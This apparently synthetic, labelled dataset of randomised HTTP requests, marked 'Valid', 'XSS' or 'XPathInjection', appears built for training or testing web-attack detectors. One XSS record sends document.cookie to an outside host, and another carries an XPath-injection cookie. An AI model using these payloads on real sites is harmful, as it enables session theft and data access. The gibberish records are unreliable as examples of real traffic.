Upgrade: scjua/4.0, O6ncj/2.1, voL8r/4.5, etq/4.7
Warning: 895 www.ef4ioNd.js "fj9cdOInrh" 
X-Forwarded-For: 11.94.114.1
X-Serial-Number: 57174297786
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18772
Start - Id: 19862
class: Valid
GET /eeiz/.2BXe/4TjycsRWAX4/tnle6sseineeiy/NnhEAinlhhcipiexnr/sv0o./jncCqvtoanoAsNdg82s.tiff?sdoihIrjh0a=6inoatqoAxaRn HTTP/1.0
Host: 139.187.122.136
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 171.173.25.232
Cookie: utofE=;d;thf=SqntocwinntuAWseiB;sGnln7Atast0qej=toommps
Cookie2: $Version="4"
Date: Fri, 25 Sep 09 08:55:39 UTC
ETag: "vVxwCMFMmG2BOCb9eJn"
Expect: 100-continue
From: aOwtSto@tiXNyad.gov
If-Modified-Since: Sun, 18 Apr 04 13:20:12 CET
If-Unmodified-Since: Sat, 14 Oct 06 01:27:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8753
MIME-Version: 2.8
Pragma: ahzih6='nUhLRn'
Proxy-Authorization: Basic YXRkcFRlZTpuc0UyZW5pbA==
Authorization: tea1o nhanj=jrinhc
Range: -436,22187-4
Referer: http://www.Yens4yxU.biz/w9de/dVeOt/uO7rse.zip
TE: deflate;q=0.4,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/9.5 (Windows; U; WinNT 5.9; nl-cd; rv:6.0.0) Gecko/72912322
UA-CPU: StrongARM
UA-Disp: 798,862,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 378x5840
Via: FTP/1.6 150.15.187.238:56154, 1.6 198.238.71.66:3
Transfer-Encoding: h4nl0a; ebohfe=atyiLus
Upgrade: ieot/7.9
Warning: 622 www.dgcaas.png "crere38dmlecltR" "Fri, 12 Oct 07 12:04:28 CET"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 62361021711
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19862
Start - Id: 19466
class: Valid
GET /S0Ebody@HnbH5W2/E3LBpassthruand/oT7nBGkmXp2JsW8/sautoexecmYE@/lFtg7geywO.js?rorae=liu0cemHonns&ntej=uLLSKqfFlCn&iwag=k_pLYBc&fofrater=tteOb1vNET&wnriwali=ruA8mD8ED.vs&lmgaahiaIoyrf=i%7E&iynn=52710514 HTTP/1.0
Host: www.ouuiCsin.fr
Connection: eeitS
Accept: text/html, audio/x-wav
Accept-Charset: hz-gb-2312, iso-8859-6;q=0.7, x-mac-greek, euc-tw;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 101.98.75.185
Cookie: sgemO=485;ausd1ohztug=m;Het=69181;e7ur=fd;.0Ys=u?5 &%
Cookie2: $Version="64"
Date: Fri, 08 Sep 06 09:18:27 CET
ETag: "2sxAmg2bScl7UvPP"
Expect: leieeu
From: onnnAm1I@spE2Fe0rns.com
If-Modified-Since: Sun, 18 Dec 05 17:53:19 CET
If-Unmodified-Since: Tue, 17 Feb 09 19:33:48 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 29 May 08 18:54:50 GMT
Max-Forwards: 2214
MIME-Version: 1.9
Pragma: trenyiy=hIoeami
Proxy-Authorization: NTLM YXV0ZW9xZXN5bjNuZXpvaWJJaGh4aWN1ZUUwZkVlS3JoZWloZVVkZWVBZQ==
Authorization: Basic ZWJ5b3Y6dGFpR3U=
Range: 814657-43,3-83878
Referer: /k7neuo/eohevrt/jArhhe/lOai1.cfm
TE: trailers
Trailer: Expect
User-Agent: qbsaRiLwkzkont0m
UA-CPU: PowerPC
UA-Disp: 915,682,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6480x436
Via: 2.7 www.er6oit.htm:65487, FTP/3.3 253.43.125.160:56242, FTP/6.1 177.221.192.107:80541
Transfer-Encoding: identity
Upgrade: Ace/7.8, srte/5.7
Warning: 833 139.253.101.46 "aPpebhw" "Sat, 11 Mar 06 14:51:53 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 219251362727568
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19466
Start - Id: 31708
class: Valid
GET /hpTbrooqae4ngHnaS/TIo/Jl/zU_HeM/uoreo/hH_@httpKpo5Zm_/oeejtLmoriweha53e/e@JaoUEdx/nmq9Gr_sPbS.d/di8e/HBCNNg2Cs.html? HTTP/1.0
Host: www.lnadtrefir.org
Connection: tlt5r
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=3809
Client-ip: 9.58.157.251
Cookie: M@G6-c=hIscripta%fromvar?y\ ;Sgroup byshutdownR5tS=ted;osorl=aO
Cookie2: $Version="85"
Date: Mon, 21 Jun 04 08:22:37 GMT
ETag: W/"-@OXl4KJ6K@bgKI8M1c"
Expect: 100-continue
From: rKtsre@uhAOD.com
If-Modified-Since: Sun, 28 Nov 04 08:05:29 UTC
If-Unmodified-Since: Thu, 18 May 06 17:09:45 CET
If-Match: "X8@f3M5Lo4daS0GekMd"
If-None-Match: *
If-Range: Tue, 07 Feb 06 04:35:48 UTC
Max-Forwards: 6
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM U25paWwzQWw0aXdoTklvem5pQWZhbjZzcml4emVuZWNyYWEzaGVoaGFyaW4=
Range: 8-
Referer: http://en9ait.be/b0ctbn/tseTlhaG/txeng/soheN3t/mumouct.swf
TE: trailers,trailers
Trailer: TE
User-Agent: eV0STarqIk http://www.nvUi.be
UA-CPU: PowerPC
UA-Disp: 029,5765,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9430x7643
Via: 5.7 www.rt1u.jpeg, 1.1 211.252.161.248
Transfer-Encoding: compress
Upgrade: iown/4.2, Tniaa/7.9
Warning: 582 63.98.99.8 "lare9ilntstaLhew" "Tue, 29 Nov 05 02:58:50 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 38371650739435332363
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31708
Start - Id: 46832
class: XSS
POST /rVxKpZIoATIbJx/ZJyadmin@0IJajvR1p/b_ARinsertin7yK/jsiox6hseicqt/th/Iodenolnai7k/uqBkRrpugmyc/1pts/lnn4eed/etz1/hU-PemQ.mspx? HTTP/1.0
Content-Length: 362
Content-Language: 5mdfll,Eb,zcr
Content-Encoding: compress
Content-Location: /1Tes/esin/lfancae/nr0lAnsa.pdf
Content-MD5: aW1sbmVzMWVkMmFlYzgybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Aug 04 23:59:25 GMT
Last-Modified: Mon, 12 Apr 04 10:41:14 GMT
Host: www.opo2.de
Connection: eu3egh
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp;q=0.7, koi8, ks_c_5601-1987;q=0.8
Accept-Encoding: compress;q=0.3, identity;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 169.136.109.14
Cookie: os6rss1SgG=4847;hoGxegibeE=Ko(%iveig ?fa8wprocessing-instruction;4cFX9k=779
Cookie2: $Version="28"
Date: Sat, 18 Jun 05 23:45:44 UTC
ETag: W/"Dc4VrdhUT1N-vmx4gu"
Expect: 100-continue
From: gUtdmw@nhajiIe.be
If-Modified-Since: Thu, 23 Nov 06 04:10:28 UTC
If-Unmodified-Since: Sat, 17 May 08 02:53:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 795
MIME-Version: 5.6
Pragma: ci=o7xr
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: /bbdeeoc/dv8et.zip
TE: deflate;q=0.6
Trailer: If-None-Match
User-Agent: Mozilla/1.8 (compatible; sm2aoeny; Linux i386; titS)
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 1.8 www.uD2z.jpg, 7.8 www.tog7ty.jpeg, FTP/3.6 159.200.13.179
Transfer-Encoding: identity
Upgrade: ccSen/7.1
Warning: 250 www.tehienag.htm:29 "ch4lludtirn1fS" 
X-Forwarded-For: 92.3.241.226
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gw0whjyrtits1e=<img   src   =   " ntasntit >     " onmouseover  = " [document.location.replace    ('http://www.raic.com/cgi-bin/ge.cgi'+document.cookie);]  "  >&vsoeretoeuii=ydloEchildm&KGR_stdinSuKohi8=rnctmp&nG.DDFhb=oYnBJQQ_3en&monenssco=679&si2u6Apr=m6ceq-&aseIPtmr7ii8qwa=723&eg6thgiht6u=m ]nete&Oi0ajrrgealla

End - Id: 46832
Start - Id: 14297
class: Valid
GET /LdS-q_ygPpmpositionU/4J_1m1/sadl/copy4EPkqo1Cig/l.QLqy0R17em2/r8k.php?fntifs=8651810&dceyoraaed=1&7dwO5tai=6233&gyueltggiddlTf=3XO&a28n9nPielat7=%24nnietico2e9an&ryntaeiree=eIeia080zeoot&hhgtf2oo=2&1rtnosa=gdf_1fe.Pql&no=%7EGt2E+&1dSiUymFv-H=680 HTTP/1.0
Host: www.aRhtleu.net
Connection: ou8xsce
Accept: */*
Accept-Charset: windows-1252;q=0.1, windows-874, x-mac-arabic, x-mac-roman;q=0.0, iso-8859-4;q=0.9
Accept-Encoding: gzip, identity, compress;q=0.6, identity, gzip;q=0.8
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 69.37.104.136
Cookie: aKHzyGUboot.ini@Tw=t%&;Cp=eppeg5a;GCperlf3=74819389
Cookie2: $Version="73"
Date: Fri, 12 Aug 05 07:13:33 UTC
ETag: "3gy0c8QKT8WDmqbWApH_"
Expect: mdtii
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Wed, 08 Jul 09 04:57:46 GMT
If-Unmodified-Since: Sat, 16 Jan 10 01:47:57 GMT
If-Match: *
If-None-Match: "6ZLj12LsDe5GtkS.kS1"
If-Range: Tue, 30 Mar 04 06:56:41 GMT
Max-Forwards: 2
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM cm9lOUJlaWxvZTJoZTZpamdibnQ2bGRoZTByd3JvZXd0b0VBdG9uNGU=
Authorization: nwes tePeoaL=pohcrE
Range: 921-,-3
Referer: /mUoaRTe.fgf
TE: trailers,chunked;q=0.7,trailers
Trailer: If-None-Match
User-Agent: Mozilla/6.5 (X11; U; Solaris 3.0; u4-ru; rv:6.9.1) Gecko/04266642
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 821x3811
Via: 9.1 www.rJhm5o5.css
Transfer-Encoding: gzip
Upgrade: anU/9.4, sythne/4.7, Tpsin/2.0, avn6ed/3.3, renTe/6.2
Warning: 099 231.6.177.213:01299 "naeeiEih" "Fri, 23 Feb 07 18:56:03 UTC"
X-Forwarded-For: 25.143.155.19
X-Serial-Number: 731610342681835186
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14297
Start - Id: 27305
class: Valid
GET /dB/wX4@/tLa-wCsc@xZ/iLonkeeAcriex/8LwhereILrcpp/lpuvzN@PnxzCvtJgaKgM.pl?5qaCe=%3Dtt HTTP/1.0
Host: www.rIeshpr8da.st
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-2, euc-kr, iso-2022-jp;q=0.5, windows-1258, hz-gb-2312
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 191.18.69.14
Cookie: 9wzanzCb=0693369;oorHu4Sr=3;taaesynooVso=?Llsfp;ncl9Too=ya;5tj6eaka=mi+
Cookie2: $Version="63"
Date: Fri, 30 May 08 08:58:46 CET
ETag: "_wrVJwBLFAB1y_jnloUz"
Expect: Rledodw
From: 0alar@rjtiat6e.uk
If-Modified-Since: Sun, 10 Aug 08 06:38:05 GMT
If-Unmodified-Since: Tue, 28 Dec 04 11:52:10 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Jan 04 05:02:05 UTC
Max-Forwards: 5
MIME-Version: 1.6
Pragma: senx=cU85442e
Proxy-Authorization: Basic cmV5b21nYzp0dGlz
Authorization: Digest cnonce="yrmhni"
Range: 66063-2335,-09970
Referer: /3seuPwnb/e2sLyse/ieZBi/mxeod1tY.htm
TE: gzip,trailers
Trailer: Via
User-Agent: m7U2Szs4o http://www.vctdo.it
UA-CPU: 68000
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6912x6352
Via: 2.0 224.232.11.39
Transfer-Encoding: gzip
Upgrade: eyr/6.9
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 50.59.239.169
X-Serial-Number: 75164077038098175
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27305
Start - Id: 17709
class: Valid
GET /stdinMO3Nutmp4D/wsIuPwH1Yp8Bf/o4M6RUGT/7qe0ze/ete1sh7rhoouol/tH9dUFIFoi.exe?ttwmilI8nwo=dBla&6eoo=re%5D&ioga4o=2722&nat=fromchttp1dl%5D1UiddUe1jSda6&riDlb9l=TaEexd%3E%2Fq HTTP/1.0
Host: www.dtT9te1j.fr:2
Connection: close
Accept: image/jpeg;q=0.4, video/quicktime
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: riladts6-gbsr;q=0.8, piotr-Dae;q=0.1, yrioif-epangWhu
Cache-Control: max-age=422
Client-ip: 248.199.250.80
Cookie: bxoni5lk7=tn]u;twwemltneawei=empe
Cookie2: $Version="69"
Date: Wed, 22 Jul 09 14:55:28 CET
ETag: "DWYPHRUU5ciuYwz."
Expect: nsea=3aSeeh;7utdaTs
From: Uucem@e0see0o8ai.uk
If-Modified-Since: Sun, 25 Apr 10 22:13:22 CET
If-Unmodified-Since: Tue, 14 Jun 05 12:17:05 CET
If-Match: *
If-None-Match: "dBz_FfbAVTRxusjboD"
If-Range: *
Max-Forwards: 45
MIME-Version: 4.2
Pragma: oo9S2gsd='dm6o'
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: AMsas teetvwf=eidyws
Range: 679-,-4232,980-9549
Referer: /tkerROtm/6ay3ss/Oennc/nie8om9s/ejdbswEa.css
TE: gzip;q=0.0,gzip;q=0.5,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.4 (X11; U; Linux i386 5.9; Cp-1r; rv:2.2.6) Gecko/24553385
UA-CPU: PowerPC
UA-Disp: 2302,8459,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7830x724
Via: 0.1 119.225.227.47:67180
Transfer-Encoding: compress
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 693 205.206.134.117 "rkctrioeeS1hAa" "Mon, 18 Dec 06 11:42:54 CET"
X-Forwarded-For: 167.172.138.87
X-Serial-Number: 197606037
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17709
Start - Id: 48461
class: XPathInjection
GET /ZiduhttpslRU4xFZLr/5qhMekhd9iBBNxh3QD_0.css?eoe=360874&0melx81do=dDm-RzcE1o_&dino5h=re8odvbscriptabnf-iRo&nzi9t=q055alld+%7Croeb4%3Cud&axiH5lIg=33&nbelqCoagjtEsd=nmin+ll8&3dr2ineahjceja=%2B&aaomanoiCtpEq=etnTih8aAnncDed&JGe2=4358&T7ht0oktsv=9103229&iil2ieeheit5=999418 HTTP/1.1
Host: www.ua9hx.biz
Connection: close
Accept: application/rtf, application/postscript, video/*;q=0.8
Accept-Charset: utf-7
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=25
Client-ip: 85.232.155.114
Cookie: sdrd=3857;bQqGWodrop_VBW=53;eoRiroenA=[w8\|elck;sOtmogNlu=3642;4lctxtewifntt=eagtcue' or    swe/2/child::node()[processing-instruction()=126]  or     'faussgH'  =  ';fImdv1nps=2863
Cookie2: $Version="7"
Date: Fri, 25 Nov 05 09:51:27 UTC
ETag: "VaD9kGWv0ENohkXhy"
Expect: 100-continue
From: rsmtnu@oinf.st
If-Modified-Since: Mon, 16 Apr 07 23:47:26 GMT
If-Unmodified-Since: Wed, 05 Oct 05 12:25:54 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 27 May 08 04:51:42 CET
Max-Forwards: 9
MIME-Version: 4.7
Pragma: reagRtfe=reads
Proxy-Authorization: NTLM ZHplNHFveWk1T3BFbW56ZW5zd2ZlaHJyY2l0dW1VYXRlbW9henMzMGRhUmVoYXNz
Authorization: Digest opaque="naeay"
Range: -4857,-4061,8-529315
Referer: /4idaI/E0tlor/tslhe4/AEkya/aswr21dl.bin
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: 5huo4i1tms/9.5.5
UA-CPU: PowerPC
UA-Disp: 746,1547,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1568x1912
Via: HTTP/5.3 www.sohss7s.jpg, HTTP/3.3 www.zGmn.tiff, cdtwEn/0.2 www.lsjr.shtml
Transfer-Encoding: deflate
Upgrade: nnn/0.7, rrk/3.0, eFiou/2.4, To4yt/2.6
Warning: 776 232.210.70.64:9838 "sOs0susNndlssbkeaeh" "Mon, 26 Mar 07 07:02:44 GMT"
X-Forwarded-For: 3.118.59.198
X-Serial-Number: 881741666326313
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48461
Start - Id: 28953
class: Valid
GET /ZvbscriptT7P@y8SWZ8v/nmhygriwecg9e/e2l_e-NwRgdtbenLnd/FEKpasswd8GF68/nCnbWDvxxqHcDl@D/RFhp3E.7-dCNd9/ftptKeX/wBT8Z/19hl2eeqktErzrn1.sh?It=ot1o%26klikeeeag%2Fln&rndofne=exfrnosa&objectxvAKhtpassoLh-=26 HTTP/1.0
Host: 43.28.149.102:99241
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.1, big5, windows-1252;q=0.9, windows-1255;q=0.8, x-mac-roman
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 26.226.102.173
Cookie: rh=ooSdjRinie/e r;Uinjf10aah= i2fta6ln;ng=n4z+h;Iene0nx=0;JFEP=351420599;sgn4liintaUSh=8tniJtko~tCnm0as
Cookie2: $Version="0"
Date: Sun, 02 Apr 06 10:07:12 GMT
ETag: "0tsajjB5_ft4NJsI"
Expect: 100-continue
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Sat, 03 Nov 07 15:38:42 CET
If-Unmodified-Since: Sun, 12 Jul 09 23:48:37 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Nov 09 11:03:48 UTC
Max-Forwards: 6
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM czFjaGFhYm1ybnRoaWFlbWVzM2F0M2lsNm5jb2VhdGxhcnBmMWdpZWI=
Authorization: Digest username="Egnoz"
Range: -332385,-432,1995-63
Referer: /oootnn03/llpyrpd/jraiypy.mp3
TE: gzip;q=0.5,gzip,gzip;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/6.3 (Machintosh; U; Mac OS X 1.2; 1T-ut; rv:9.5.1) Gecko/68109680
UA-CPU: MIPS
UA-Disp: 3959,584,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1053x1221
Via: HTTP/2.3 176.128.255.193:1174, 2.0 237.102.67.192
Transfer-Encoding: compress
Upgrade: 9zTj/4.9, nzwna/5.5, gjydto/4.3, wese/6.3
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7184697
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28953
Start - Id: 30970
class: Valid
GET /Eansjdif/ra/eLYRvUm7D/ritttihl2nil1ce3doH/atnhu.php4?uqvInRbody.r=iinsertlront6o&dets=713176187&Anm6gmv1manreE=+dmahttps9inetm&pL76OoAlovt=ychildZTle%7Copt%24obwgetta&tH9_KZGYr=4343723&pozat=1&E7rai=818883&c5imabESo=3982880964&zcraj=itatssmx1&ehaNnt2=aUy.N1- HTTP/1.1
Host: www.ii3c.be
Connection: close
Accept: */*
Accept-Charset: iso-8859-3, iso-8859-3;q=0.1, cp-936;q=0.8, iso-8859-6;q=0.6, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=601
Client-ip: 247.73.147.159
Cookie: tojocaetrh=052033;ayxmevdrUla=1;GrlxdmnJx=/son;Ittysi4z1ifetuo=rrcpes;4qMe4varI6U6u=sorlt;oeLswnanpvsiT=soYo-lA
Cookie2: $Version="339"
Date: Sat, 17 Nov 07 23:25:30 GMT
ETag: "5e_Nr_S.RrEhzGj7@IRz"
Expect: 100-continue
From: grsl@tetg8e3sNy.uk
If-Modified-Since: Mon, 27 Dec 04 08:23:11 UTC
If-Unmodified-Since: Tue, 04 May 04 12:47:00 CET
If-Match: "wdHe3UMnh7mOoSZ"
If-None-Match: "Zp6qDn2jvs.kREfJ"
If-Range: "WgLvlCjpzl72dIFYF8@"
Max-Forwards: 09
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM YXRlb29jamN4Y29lZGFhNmhhdFRvYXRMaHdzY2lwb2VoRGVlRTkzb2w1Y3M=
Authorization: Basic YTVsZTk6ZW1hZHNo
Range: 96684-08201,932-,8136-
Referer: /38ted.jpg
TE: chunked;q=0.2,deflate;q=0.5,trailers
Trailer: Via
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 6.3; ln-uj; rv:7.9.9) Gecko/10863796
UA-CPU: PowerPC
UA-Disp: 6522,303,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 349x4408
Via: 2.0 www.t4eaiot.gif, 1.6 www.Usoxyfe.png:5407, 0.3 www.fon2l.jpg
Transfer-Encoding: deflate
Upgrade: ehia/0.0, eN7b/7.6
Warning: 912 www.svdVuoCG.jpg "fhodof" "Sat, 09 May 09 20:18:55 CET"
X-Forwarded-For: 228.18.153.246
X-Serial-Number: 65625
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30970
Start - Id: 22235
class: Valid
GET /6ssklHoog1hzotscor/nux3/rz6a/i_1-6BygM/Heaiic.pl?@i_inKQHQQ=ttelneteznph-awvrce&ftIe=4206545547&ol28reueihe=ekX%405dK8ugsF&lr5lerr=eorinsstnph- HTTP/1.1
Host: www.yataerwrch.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.0, gzip;q=0.7, deflate;q=0.6, identity
Accept-Language: 1nfnbiih-nc6ltN, sd-bsec;q=0.1, hsrSorte-fn5
Cache-Control: max-stale
Client-ip: 27.61.205.86
Cookie: iN8reeot=651;eoernbyaep=6678;EsnlbbwhhoknE=19;owsou=ZD9etAefeRclv
Cookie2: $Version="51"
Date: Wed, 26 Mar 08 18:05:49 GMT
ETag: "fPjcj@pS18lQJ1AX"
Expect: ljhEdvL
From: orEtts@ismhaeter.de
If-Modified-Since: Thu, 26 Jun 08 03:42:30 GMT
If-Unmodified-Since: Tue, 04 May 10 21:05:08 GMT
If-Match: *
If-None-Match: "FPXKHbeNST3LTxXy"
If-Range: Thu, 24 Mar 05 04:44:10 UTC
Max-Forwards: 943
MIME-Version: 1.9
Pragma: aks='2Shlras'
Proxy-Authorization: Basic dXJsNnJyczpzZWJzM2Rj
Authorization: Basic Y2J3dDphSTVjM2l4bA==
Range: -09
Referer: http://mhsetl.biz/demo/vuey/ikciN.dll
TE: deflate;q=0.6
Trailer: Accept-Encoding
User-Agent: n4tz/0.5
UA-CPU: Sparc
UA-Disp: 4787,167,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1581x2081
Via: 7.4 198.179.28.102
Transfer-Encoding: identity
Upgrade: llxrnU/8.5, 9sez/6.3, 5o9gtz/1.6, sio/7.4, ahOwn/2.8
Warning: 325 152.245.154.177 "a0rdksFt4rsa" 
X-Forwarded-For: 94.18.15.215
X-Serial-Number: 35178476793
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22235
Start - Id: 19659
class: Valid
GET /f63IEmJ.bAo.5/empntnBdjaqoerrfyt/lV-UOEjoL5zx/adJyhFPkMb.auGme/bU7mNDB/asebcop/uS41H.htm?oxi=oiprocessing-instructionqh&loAYe=i4-qxlv&ntzeeeer74te=nBF9W&HaoiayeiwNu=wmi+H&htetsesb=mxhtisah3dm7&aO=788813&edeskbo=0989462&0sKGaewZ-a=nsretch&evXshutdownzCEhttpsq=yrcysZEZt&tytoaapcr=7zA8aU&ibA75h=rdaccess_logeps%28e+wneToemeh&rgprtHnc=lnLet HTTP/1.1
Host: www.ioch.be:6
Connection: evd81cn
Accept: */*;q=0.7
Accept-Charset: windows-1250;q=0.4, iso-8859-3, windows-1253, iso-8859-6;q=0.0
Accept-Encoding: 
Accept-Language: tait9iob-snwaie;q=0.7, 7-n, gn4nUy0-sd;q=0.6
Cache-Control: min-fresh=83
Client-ip: 168.153.129.43
Cookie: tj=680;dtAfriyutpo=d0=pg
Cookie2: $Version="400"
Date: Fri, 28 Nov 08 06:55:38 UTC
ETag: W/"-qsLuv-EiEwuhFBn4MD"
Expect: nsr1=r1ent9e
From: sbhe@iho1e.be
If-Modified-Since: Sun, 30 Apr 06 04:52:20 UTC
If-Unmodified-Since: Wed, 27 Aug 08 15:27:05 CET
If-Match: "9gBXlsj_@s@HDOma0"
If-None-Match: "By9Zhi9bJbd69ZAzgwA"
If-Range: Wed, 18 Jan 06 02:28:12 GMT
Max-Forwards: 57
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: k6alo gePtrSo=nmete
Range: -382
Referer: http://www.pvaegdeG.fr/as4meae/vToi/pmniEDl/ntrYtwt.gif
TE: trailers
Trailer: If-Match
User-Agent: I11p/7.1.4
UA-CPU: StrongARM
UA-Disp: 4810,493,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 106x833
Via: HTTP/4.7 www.yakra.shtml, 6.4 www.weoine.jpeg, 4.3 www.nGsaaa.htm
Transfer-Encoding: gzip
Upgrade: eShaio/0.4
Warning: 745 12.204.177.161 "sarooat4noSgi" 
X-Forwarded-For: 152.55.56.249
X-Serial-Number: 3717830
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 19659
Start - Id: 10453
class: Valid
GET /UXFeL2qB/06tanocp/sQe/ho.gif? HTTP/1.0
Host: 38.243.106.97
Connection: keep-alive
Accept: application/*, image/*, audio/*
Accept-Charset: *
Accept-Encoding: identity;q=0.1, compress, gzip
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 104.189.162.224
Cookie: esTafistIase=lWnhOWAvruSO;ym9cnfnq=e7/+ ;tnleo=3821;oo5=rDAJEzM
Cookie2: $Version="955"
Date: Thu, 27 Aug 09 12:36:16 GMT
ETag: W/"E7SJFnASO1TYXWbI"
Expect: 100-continue
From: ibieNid@J8oa.be
If-Modified-Since: Mon, 03 May 04 22:36:43 UTC
If-Unmodified-Since: Thu, 23 Mar 06 13:43:31 UTC
If-Match: *
If-None-Match: "-50on89I6ho5nqCX.hST"
If-Range: Fri, 14 Aug 09 08:49:02 CET
Max-Forwards: 252
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic aXp1aUhzYWU6cXRpdHJublU=
Authorization: Basic ZHRybGdrdDpzb2dyRWhudA==
Range: 5-355295,61313-1,05930-37268
Referer: /bjmunin/degnynen.pdf
TE: deflate;q=0.0,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/3.5 (compatible; haeicefrf; Win98; rvao4lrgDt; phhocertte; an6AaR)
UA-CPU: StrongARM
UA-Disp: 4910,021,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 166x378
Via: 2.4 www.lseahib.html:92, 2.7 www.Nit5n.css:088
Transfer-Encoding: deflate
Upgrade: ctah/6.6, Rtzei/0.4, fl4/6.0, eofhle/5.9, 7euoNe/5.2
Warning: 079 207.58.135.243:6637 "lldeeiya7z2nb" "Sat, 20 Mar 04 17:46:02 CET"
X-Forwarded-For: 39.2.165.130
X-Serial-Number: 565897995851
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10453
Start - Id: 19413
class: Valid
GET /iGGxhL7HO5oxqADR9/skt4net/vfMH@HW/twAeae/iJD4Ad/imq-KVKCuAFZ3/eC2rK/eeSswgIndkxlwirh/qo89miL31mS6tANh0W.sh?no=eoDeoewsfYr&niTgec3nocny=519939&w1tysWi5e=u9vPlx&xedutaonF6=226&nwase=de&iwoEsiiptm8Grn=s6ns%27&4hy2dq=oo+a&veatkln=5461082&atenstcieej=ete&rvivnoeeea1edeM=lr%3Ayd+6rgta2eS&39e=6&Texec0scFpGI=606010&rok=amurmI8aaht1eyn HTTP/1.1
